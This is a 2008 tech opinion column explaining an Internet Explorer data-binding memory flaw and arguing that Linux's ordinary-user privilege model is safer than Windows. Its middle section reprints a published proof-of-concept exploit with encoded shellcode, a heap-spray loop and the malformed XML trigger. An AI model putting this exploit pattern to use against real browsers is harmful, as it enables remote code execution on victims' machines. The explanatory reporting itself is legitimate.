Author's Opinion

The views in this column are those of the author and do not necessarily reflect the views of iTWire.

Have your say and comment below.

Sunday, 21 December 2008 10:59

Why the latest IE flaw proves Linux got it right from the start

By
You've all heard a major new flaw has been found affecting Internet Explorer all the way back to version 5. Microsoft pushed out a fix out of their regular "patch Tuesday" monthly schedule. The flaw has prompted some commentators to call for the replacement of IE with alternate browsers like Firefox. Just what was so serious? And what do Microsoft say that show Linux has the superior design?

This security update is rated Critical for Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, and Internet Explorer 7.

It could be critical for previous versions of Internet Explorer too but Microsoft didn't test them because they're no longer supported.

Being a curious type when I saw all the hubbub about a new major critical vulnerability in Internet Explorer I wanted to know just what it was about.

First, the best way to get the fix for your Windows operating system, irrespective of flavour, is Windows Update. Yet, the text accompanying the update is typically brief:

Security Update for Internet Explorer 7 in Windows Vista (KB960714)
Published 18th December 2008
Update type: Important

Security issues have been identified that could allow an attacker to compromise a system running Microsoft Internet Explorer and gain control over it. You can help protect your system by installing this update from Microsoft.


While that doesn’t tell us much, the knowledge base article (or “KB”) 960714 referenced does spill the beans.

Fundamentally, it was discovered that program code – of a malicious person’s construction – be executed on your computer, if a user views a specially crafted web page with IE.

In particular, a rogue script can allocate a block of memory (an array) then apparently release it without updating the array’s length, meaning that the block of memory still remains preserved.

Then, if data binding is enabled (which it is, by default), a rogue web page can take advantage of an incorrect handling of certain XML tags within IE to cause the browser to pass control to the supposedly free memory location.

If the script had pre-filled that memory with actual executable instructions then the author has effectively been able to cause your computer to do something of their bidding, under your user credentials.

You can find a harmless code example over the page which will make calc.exe (ie Windows Calculator) display itself. The code is merely presented in a readable format; it will not actually run.

CONTINUED






This code snippet was published on exploit web site milw0rm.com and illustrates how the exploit works.

First, some pre-amble HTML markup.

<html>
<div id="replace">x</div>

<script>

Now the program script itself; the shellcode object contains the machine code instructions to execute a process, running calc.exe.

Note, I have broken this line up for readability but you ought to ensure it is all one continuous line when pasting it into a text editor:


var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

The next piece of script code sprays the heap to push the memory address of the array onto it, in an effort to make it callable:

var spray = unescape("%u0a0a%u0a0a");


do {
   spray += spray;
} while(spray.length < 0xd0000);


memory = new Array();


for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;


And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.

This too should be one continuous line in a text editor:

xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";


tag = document.getElementById("replace");
tag.innerHTML = xmlcode;


</script>
</html>


Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.

Microsoft offer instructions how to mitigate the effectiveness of this vulnerability and in so doing indirectly espouse the Linux viewpoint on secure computing. Let me explain.

CONTINUED






I won’t repeat the comments made by others that using a different web browser, such as Mozilla Firefox, will protect you from problems like this, but I will comment on something else.

Microsoft note that users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

That makes sense; if a user runs with administrator privileges the rogue code can have full control of their system. If the user is unprivileged then the attack surface is much less.

Nevertheless, it’s a pipe dream. Unlike operating systems like Linux which have always encouraged users to have “ordinary” accounts and only claim administrator privileges when needed, and only for performing specific tasks, Windows has trained its users – and worse, its legion of developers – to always run as the local administrator.

Vista’s UAC was intended to help mitigate this problem but proved unpopular due to the great number of programs which necessitate elevated privileges.

Perhaps the ultimate solution for a safe online experience isn’t to just change your browser but to change your OS also.

Give thought to Linux; it is safe by design. This design has lasted the test of time. This design is now a major differentiation between it and Windows.

Microsoft are hoping to undo their bad security design by re-educating its horde of users to a Linux way of life. This re-education isn't working, largely because any attempts to run within a totally unprivileged environment mean the bulk of your programs no longer work.

Microsoft have to bite the bullet and obliterate the design goal of backward compatibility if they ever hope to genuinely have an operating system where administrator-level accounts aren't used for ordinary logins and usage. It's not going to be pretty.

Meanwhile, Linux just keep soldiering on. It got it right from the start. Its users are accustomed to running sudo if they temporarily require higher access as the following xkcd comic illustrates.

xkcd - sudo make me a sandwich


BACK TO HOME PAGE

NEW OFFER - ITWIRE LAUNCHES PROMOTIONAL NEWS & CONTENT

Recently iTWire remodelled and relaunched how we approach "Sponsored Content" and this is now referred to as "Promotional News and Content”.

This repositioning of our promotional stories has come about due to customer focus groups and their feedback from PR firms, bloggers and advertising firms.

Your Promotional story will be prominently displayed on the Home Page.

We will also provide you with a second post that will be displayed on every page on the right hand side for at least 6 weeks and also it will appear for 4 weeks in the newsletter every day that goes to 75,000 readers twice daily.

POST YOUR NEWS ON ITWIRE NOW!

INVITE DENODO EXECUTIVE VIRTUAL ROUNDTABLE 9/7/20 1:30 PM AEST

CLOUD ADOPTION AND CHALLENGES

Denodo, the leader in data virtualisation, has announced a debate-style three-part Experts Roundtable Series, with the first event to be hosted in the APAC region.

The round table will feature high-level executives and thought leaders from some of the region’s most influential organisations.

They will debate the latest trends in cloud adoption and technologies altering the data management industry.

The debate will centre on the recently-published Denodo 2020 Global Cloud Survey.

To discover more and register for the event, please click the button below.

REGISTER HERE!

BACK TO HOME PAGE
David M Williams

David has been computing since 1984 where he instantly gravitated to the family Commodore 64. He completed a Bachelor of Computer Science degree from 1990 to 1992, commencing full-time employment as a systems analyst at the end of that year. David subsequently worked as a UNIX Systems Manager, Asia-Pacific technical specialist for an international software company, Business Analyst, IT Manager, and other roles. David has been the Chief Information Officer for national public companies since 2007, delivering IT knowledge and business acumen, seeking to transform the industries within which he works. David is also involved in the user group community, the Australian Computer Society technical advisory boards, and education.

BACK TO HOME PAGE

Webinars & Events

VENDOR NEWS

REVIEWS

Comments